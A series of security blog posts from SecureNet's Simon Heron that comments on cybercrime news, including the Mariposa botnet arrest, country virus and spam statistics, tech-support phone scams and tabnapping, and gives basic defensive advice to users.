Simon Heron – SecureNet

Our recent paper, The State of International Co-operation on Cybercrime, explored what the international community has done, or tried to do, to tackle the cybercrime issue. It’s quite rare to have the opportunity to highlight a great example of international co-operation, but according to V3.co.uk, a hacker responsible for one of the largest botnets ever created has been arrested thanks to an international effort. The arrest comes months after Spanish police arrested three people, alleged to be the ringleaders of the operation.

The Mariposa botnet, which infected some 12 million computers and some HTC mobile devices, also impacted major banks and US Fortune 500 companies. The virus allowed hackers to steal online banking and credit card details, as well as giving them access to other sensitive data.

This further arrest is a good example of what can be done when nations co-ordinate their fight against cybercrime, and it does serve as a warning to other hackers that their business is more risky than they may imagine. However, at the moment the major ‘wins’ in the fight against cybercrime – at an international level – seem to be high profile attacks that target major corporations and financial institutions. Which is somewhat inevitable given the work required to co-ordinate efforts across borders. Somehow, this co-operation has to be encouraged and eased so that the vast number of smaller attacks which are businesses and home users can be dealt with.

The British government recently announced a major re-organisation of law enforcement bodies in England. Changes that will impact the way authorities tackle cybercrime. Whilst it’s true that cybercrime is an international problem, individual Governments need to ensure that they have a strong, coherent cybercrime strategy and taskforce in place to tackle the rising threat that internet fraudsters represent to homes and businesses.

Our July internet threat statistics, which have just been published, clearly demonstrate that now is not the time to neglect the fight against cybercrime (something which the recent policing green paper may indicate).  The UK now produces around five per cent of the world’s viruses and spam, coming in fourth place in the top 10 worldwide hotspots. The United States still dominates the charts, producing over 14 per cent of viruses and 11 per cent of spam in the world.

If we compare the most recent statistics to January 2010, a few things become apparent:

-    Brazil, responsible for 15 per cent of the world’s viruses in January, doesn’t feature in the top ten virus producers in July, and produces 2.7 per cent less spam than it did (it’s now responsible for 4.9 per cent).
-    The UK, which was in neither the spam or virus charts in January, is now producing five per cent of the world’s spam and viruses.
-    The US remains a top three virus and spam producer, increasing virus production by 3.4 per cent (to 14.6 per cent) and spam production by 1.4 per cent (to 11.4 per cent).
-    India’s virus production has risen by six per cent (and is now 9.5 per cent) and spam production has risen by two per cent (to 8.7 per cent).

The figures show how dynamic the cybercrime ‘industry’ is. Often comprised of a global network of infected computers, employing people working alone or in small teams, these gangs can operate in a far more fluid way than legitimate organisations and will move their base of operations to less stringent jurisdictions if they feel threatened. This is why there needs to be an international solution to the problem, otherwise it will continue to get worse and we’re likely to see more countries being responsible for less malware as the cyber gangs spread around the world – making it harder for law enforcement to put out the fires.

Recent articles published in the Guardian have revealed that fraudsters are continuing to cold call people, claiming to be a Windows support tech and getting the users to give them remote access to their PCs in the guise of helping them update their systems – as long as the user hands over £185.

This scam has actually been around for quite some time and whilst police may struggle to stop criminals from setting up business under a new name once they have been shut down, the potential victims can take control of the situation by putting the phone down.

It is, however, concerning that people are still willing to not only give a cold caller their card details, but also allow them remote access to their computers. These people are taking huge risks with their personal data, not to mention the potential illegal content that could be installed whilst the machine is under someone else’s control.

It’s not clear where these criminals are getting their call lists from. Comments on a Guardian article reveal that the data could be leaking from other Indian call centres that call people for legitimate reasons. What is clear is that the callers know what they are talking about. They seem to be highly trained technicians and can therefore easily befuddle the less technical-minded computer user into granting unfettered access to their PC and handing over their card details for the privilege.

The easiest way to prevent becoming a victim of this scam is by knowing that you only allow someone you know and trust to have access to your computer, and by putting down that phone on all others.

The Government is right to ask for help in reviewing the Data Protection Act, which undoubtedly needs an overhaul. But is the best way to do this really to survey UK citizens on their views? There may be some people who have in-depth knowledge of the ways that data can be used to carry out identify fraud, or compromise accounts, but surely a more sensible way to go would be to create a panel of experts who could come up with a workable review?

My concern is that, at a time when government has to be seen to be cutting down on quangos, there will be resistance to creating a DPA review panel. But asking the public what do to about the data protection – a complex technical issue about which the majority of informed citizens will probably have only a passing knowledge – seems a step too far in popularist government.

Of course, most people are going to say data protection is A Good Thing. No-one wants their child’s details to be lost or stolen (as we saw today by the ICO’s action against London Borough of Barnet, West Sussex County Council and Buckinghamshire County Council). But understandably, most people (unless they have a real interest in this area) won’t know the multiplicity of ways that data can be used to carry out identity theft, fraud or other criminal activity. If they did, the problem wouldn’t be as serious as it is.

Even people who should be really informed in this area have been caught out. We have seen Yahoo again compromised with Bob Dvorsky (a US senator). This is probably done in the same way as Sarah Palin’s account was compromised, weak password reset questions being just one way of exploiting people.

Let’s hope, then, that those citizens the government chooses to survey are those who are experts in this area, who know that workable solutions are not always straightforward; and even so-called experts don’t always get it right (the Digital Economy bill showed us that).

At the beginning of May, I wrote that the Russian hosting service, PROXIEZ-NET – which was notoriously used by criminal gangs – was taken down by the authorities.

The result was a temporary decline in malware originating from Russia which suggested that this botnet was largely populated by systems in Russian itself though this might have been co-incidence.  However, as predicted, those figures are up to their usual levels again this month. Russia is once again one of the top four virus-producing countries, behind the US, Korea (South Korea in the main), and India.

The lesson from this is that, unfortunately, criminal gangs are not as easy to shut down as the hosting services they use. Shutting down the site will inconvenience the criminals for a short period – but the financial gains to be made in criminal activity online are sufficient that they will find a way of getting back up and running.

Our analysis – which you can see here – also showed that the levels of spam and viruses coming from the UK are still high. In times of economic uncertainty, criminal activity naturally increases. As ever, our advice to all internet users is to be cautious. If a deal seems too good to be true, it probably is.

Last week’s Talinn conference was the latest in a series of international gatherings to discuss cybercrime. Unfortunately, although international cooperation is an essential element in defeating cybercrime, these discussions have so far been unable to find an actionable agreement.

Yes, treaties have been signed and in some cases, ratified, but what use are these documents if they don’t produce results? In our new paper, The state of international co-operation on cybercrime, we explore what has been done to create an international response to cybercrime and look at what is still left to be done.

Clearly, it will take quite a while for nations to agree and implement an international strategy to fight cybercrime. It could even end up being a private sector initiative – consumers need protecting and businesses don’t have the same diplomatic worries that Governments do.

But it’s imperative that Governments keep working together to find a solution in the interim and with the UK now being responsible for almost six per cent of the world’s viruses and receiving more than its fair share of malware, it’s obvious that finding an international solution to the problem should be one of the new British Government’s number one priorities.

Meanwhile, the IT industry will keep developing defences to the increasingly varied attack vectors and  trainers will endeavour to spread the word on security to users.  However, in parallel governments need to continue to try and find some form of agreement that will enable them to fight this menace together.

Twitter users are no strangers to receiving spam tweets about trending topics, but spammers are becoming more sophisticated. As reported by TechCrunch, Twitter users are starting to get spam that gives them an @ mention and tells them to watch or read something.

This method takes advantage of the fact that Twitter users love being mentioned in a tweet and will naturally want to see what they’re being referred to. It also relies on shortened urls to hide the true url being promoted.

Unfortunately, we’re all going to come into contact with some questionable characters from time to time, both in the real and virtual world. Of course, it can be harder to judge people online, without the usual audio and visual cues that we depend on. We’re also likely to have more encounters of this kind online, due to the sheer amount of interaction that takes place there.

If someone you’ve never tweeted before, and that you don’t follow, sends you a link via twitter, keep in mind that this person is a stranger and that by clicking on the link you are effectively welcoming them into your home (for home read computer). Take precautions to try and protect against tricks as you would when meeting a stranger.

If using Firefox, use ‘NoScript’ on a website until you trust it, employ similar means on IE and Chrome. Ensure you have the latest update on your operating system, browser and anti-malware installed.

Don’t forget, if you receive a suspicious tweet you can always block and report the user for spam.

A guide on how to use Twitter securely can be down free from the Network Box website.

It was with more than a little concern that I read about Monday’s attack on the Strathclyde Police website. Sadly, attacks on websites have become all too common, but what really grabbed my attention was the statement released by the Police which highlighted a level of naivety I did not expect from the police.

As reported in The Drum:

“They ruled out viruses as the cause and said that no one who had logged onto the site, would have put their computer at risk.”

Perhaps they intended to say that they trust their employees, that they are well trained and educated about current internet threats. But, this completely ignores the fact that most people don’t willingly download viruses and Trojans onto their computers, they are tricked into doing so and frequently have no idea that they are infected.

Then there are the passwords to consider. I remember a case around 20 years ago where a Police force were securing their systems with the password ‘police’. Of course, one would expect people, especially the Police, to be far savvier these days, but weak passwords are endemic and maybe someone just did not take care. As we’ve advised before, it’s important that people change their passwords regularly, using a mixture of upper and lowercase letters, numbers and symbols rather than dictionary words or anything that would be easy to guess.

I’d also be careful about pinpointing blame. It’s unclear why China has been pinpointed as the source of the attack, but it could be anyone pointing links at a server in a country that is, perhaps, just a little slower than others in taking down servers that host malware.

Taking the website down whilst they investigate the cause of the breach is obviously the best response. It’s likely that this was some kind of SQL injection or cross scripting attack and until that error is found, the site remains vulnerable.

The one thing that is clear from this is that adequate security was not in place at the time of the attack, and that is something that will need to be remedied before the site goes back online.

Our May threat statistics are out and show that the UK is now responsible for almost six per cent of the World’s internet viruses (production is up from 3 per cent in April). This makes the UK the third largest producer of viruses after Korea (at over 16 per cent) and the US (at almost 12 per cent).

This growth in the UK suggests that end users in the UK are not being careful and either visiting malicious sites or running executable attachments to their emails. It also suggests that they are not installing good anti-virus software which is probably the most vital step in defending themselves.  It should be kept in mind that if a computer is sending out viruses, it is ‘owned’ by the hacker who is running the virus and may also be running software to find passwords and credit card details. .

Russia has seen a decline in virus production, which may be as a result of PROXIEZ-NET being taken down, but we shouldn’t assume that this trend will last. As we saw with the McColo shutdown in 2008, cyber-criminals tend to bounce back from these setbacks quickly.

Tabbed browsing has been around for quite a while now, allowing users to switch between dozens of websites whilst keeping the task bar clutter free. One 2009 study discovered that users switch tabs at least 57.4% of the time, 36% of users opening new tabs for search engine use.

It’s become common practice for internet users to login to several websites at once using the tab method. A recent study of Firefox users by Mozilla revealed the following reasons for using tabbed browsing:

-    To act as a reminder to do something later
-    Opening many document/search links at once
-    As a substitute for the back button
-    Keeping frequently used sites open
-    Temporary bookmarks

The study also found that an average of 73.3% of tab switches were revisits.

All of this would simply be an interesting way of looking at internet browsing if it weren’t for one small detail. Cyber-criminals are exploiting the system.

During a typical day in the office, you may have several applications that require a login open at once. Let’s say you have Google, LinkedIn, Twitter, BBC News and Amazon open. You’re in the middle of looking for something on Amazon, when someone asks you to find an article for them, so you switch to Google and carry out a search. After a while, you switch back to Amazon and are confronted not with the page you were previously on, but with the login page. No problem, you’ve obviously just been kicked out of the site and just need to log back in. That’s what many would assume, and that is the assumption that phishers are playing on.

“Tabnapping”, as its being called, is where a hacker uses JavaScript to manipulate one of your inactive tabs so that when you return to it, you’re on a fake login page rather than the one you’d left it on. Unless you check the url, you may not realise that the page is a fake, or that your online bank was your last tab, but is now the second. The fake page may even display a message saying that your session has timed out. Aza Raskin of Mozilla demonstrates just how easy it is to hack the tab and fool the unwitting user. (You can also find out more about the problem, and test it out for yourself over at his blog).

So, what can the user do? Normally, I would recommend installing noscript on Firefox to prevent unauthorised JavaScript from running on your computer, but that won’t help in this case. Aspects of the users behaviour need to change as well. Users should keep the number of tabs open to a minimum; always check that the url matches the site before you enter any login, financial or identity information; and if in doubt, close the tab and navigate to the page again.

It’s important to remember that when we fill out online forms and submit login details, we are entrusting our information to an organisation outside our control. It’s not enough just to trust these organisations to protect our data. We need to make sure we do, too.